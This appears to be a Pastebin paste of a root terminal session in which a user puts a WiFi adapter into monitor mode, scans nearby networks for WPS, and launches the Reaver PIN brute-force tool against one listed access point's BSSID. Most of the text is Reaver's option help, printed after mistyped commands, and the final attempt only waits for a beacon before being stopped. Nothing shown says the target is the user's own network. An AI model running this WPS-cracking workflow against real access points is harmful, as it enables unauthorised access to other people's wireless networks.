Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@D0NTRES0LV5M5:~# ifconfig wlan0 up
- root@D0NTRES0LV5M5:~# ifconfig
- eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
- inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
- inet6 fe80::a00:27ff:febf:3a49 prefixlen 64 scopeid 0x20<link>
- ether 08:00:27:bf:3a:49 txqueuelen 1000 (Ethernet)
- RX packets 4 bytes 930 (930.0 B)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 34 bytes 2668 (2.6 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
- inet 127.0.0.1 netmask 255.0.0.0
- inet6 ::1 prefixlen 128 scopeid 0x10<host>
- loop txqueuelen 0 (Lokale Schleife)
- RX packets 20 bytes 1200 (1.1 KiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 20 bytes 1200 (1.1 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
- ether 00:1f:3f:08:a2:36 txqueuelen 1000 (Ethernet)
- RX packets 0 bytes 0 (0.0 B)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 0 bytes 0 (0.0 B)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- root@D0NTRES0LV5M5:~# airmon-ng check kill
- root@D0NTRES0LV5M5:~# airmon-ng start wlan0
- PHY Interface Driver Chipset
- phy0 wlan0 carl9170 AVM GmbH Fritz!WLAN N 2.4 [Atheros AR9001U]
- (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
- (mac80211 station mode vif disabled for [phy0]wlan0)
- root@D0NTRES0LV5M5:~# iwconfig
- eth0 no wireless extensions.
- wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Power Management:off
- lo no wireless extensions.
- root@D0NTRES0LV5M5:~# wash -i wlan0mon
- Wash v1.5.2 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- 7C:4F:B5:5F:BC:1B 6 -64 1.0 No WLAN1
- 54:88:0E:D2:64:88 6 -66 1.0 No WLAN2
- D4:21:22:5B:D9:E3 11 -64 1.0 No WLAN3
- B0:48:7A:DB:3F:72 4 -63 1.0 No WLAN4
- [X] ERROR: Failed to open 'wlan0mon' for capturing
- root@D0NTRES0LV5M5:~# iwconfig
- eth0 no wireless extensions.
- wlan0 IEEE 802.11bgn ESSID:off/any
- Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Encryption key:off
- Power Management:off
- lo no wireless extensions.
- root@D0NTRES0LV5M5:~# airmon-ng start wlan0
- PHY Interface Driver Chipset
- phy1 wlan0 carl9170 AVM GmbH Fritz!WLAN N 2.4 [Atheros AR9001U]
- (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
- (mac80211 station mode vif disabled for [phy1]wlan0)
- root@D0NTRES0LV5M5:~# iwconfig
- eth0 no wireless extensions.
- wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Power Management:off
- lo no wireless extensions.
- root@D0NTRES0LV5M5:~# reaver -i wlan0mon^C
- root@D0NTRES0LV5M5:~# reaver -o wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6 -vv
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- Required Arguments:
- -i, --interface=<wlan> Name of the monitor-mode interface to use
- -b, --bssid=<mac> BSSID of the target AP
- Optional Arguments:
- -m, --mac=<mac> MAC of the host system
- -e, --essid=<ssid> ESSID of the target AP
- -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
- -o, --out-file=<file> Send output to a log file [stdout]
- -s, --session=<file> Restore a previous session file
- -C, --exec=<command> Execute the supplied command upon successful pin recovery
- -D, --daemonize Daemonize reaver
- -a, --auto Auto detect the best advanced options for the target AP
- -f, --fixed Disable channel hopping
- -5, --5ghz Use 5GHz 802.11 channels
- -v, --verbose Display non-critical warnings (-vv for more)
- -q, --quiet Only display critical messages
- -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
- -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
- -h, --help Show help
- Advanced Options:
- -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
- -d, --delay=<seconds> Set the delay between pin attempts [1]
- -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
- -g, --max-attempts=<num> Quit after num pin attempts
- -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
- -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
- -t, --timeout=<seconds> Set the receive timeout period [5]
- -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
- -A, --no-associate Do not associate with the AP (association must be done by another application)
- -N, --no-nacks Do not send NACK messages when out of order packets are received
- -S, --dh-small Use small DH keys to improve crack speed
- -L, --ignore-locks Ignore locked state reported by the target AP
- -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
- -n, --nack Target AP always sends a NACK [Auto]
- -w, --win7 Mimic a Windows 7 registrar [False]
- -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
- -1, --p1-index Set initial array index for the first half of the pin [False]
- -2, --p2-index Set initial array index for the second half of the pin [False]
- -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
- -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
- Example:
- reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
- root@D0NTRES0LV5M5:~# reaver -o wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- Required Arguments:
- -i, --interface=<wlan> Name of the monitor-mode interface to use
- -b, --bssid=<mac> BSSID of the target AP
- Optional Arguments:
- -m, --mac=<mac> MAC of the host system
- -e, --essid=<ssid> ESSID of the target AP
- -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
- -o, --out-file=<file> Send output to a log file [stdout]
- -s, --session=<file> Restore a previous session file
- -C, --exec=<command> Execute the supplied command upon successful pin recovery
- -D, --daemonize Daemonize reaver
- -a, --auto Auto detect the best advanced options for the target AP
- -f, --fixed Disable channel hopping
- -5, --5ghz Use 5GHz 802.11 channels
- -v, --verbose Display non-critical warnings (-vv for more)
- -q, --quiet Only display critical messages
- -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
- -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
- -h, --help Show help
- Advanced Options:
- -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
- -d, --delay=<seconds> Set the delay between pin attempts [1]
- -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
- -g, --max-attempts=<num> Quit after num pin attempts
- -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
- -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
- -t, --timeout=<seconds> Set the receive timeout period [5]
- -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
- -A, --no-associate Do not associate with the AP (association must be done by another application)
- -N, --no-nacks Do not send NACK messages when out of order packets are received
- -S, --dh-small Use small DH keys to improve crack speed
- -L, --ignore-locks Ignore locked state reported by the target AP
- -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
- -n, --nack Target AP always sends a NACK [Auto]
- -w, --win7 Mimic a Windows 7 registrar [False]
- -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
- -1, --p1-index Set initial array index for the first half of the pin [False]
- -2, --p2-index Set initial array index for the second half of the pin [False]
- -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
- -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
- Example:
- reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
- root@D0NTRES0LV5M5:~# reaver -i wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- [+] Waiting for beacon from 7C:4F:B5:5F:BC:1B
- ^C
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement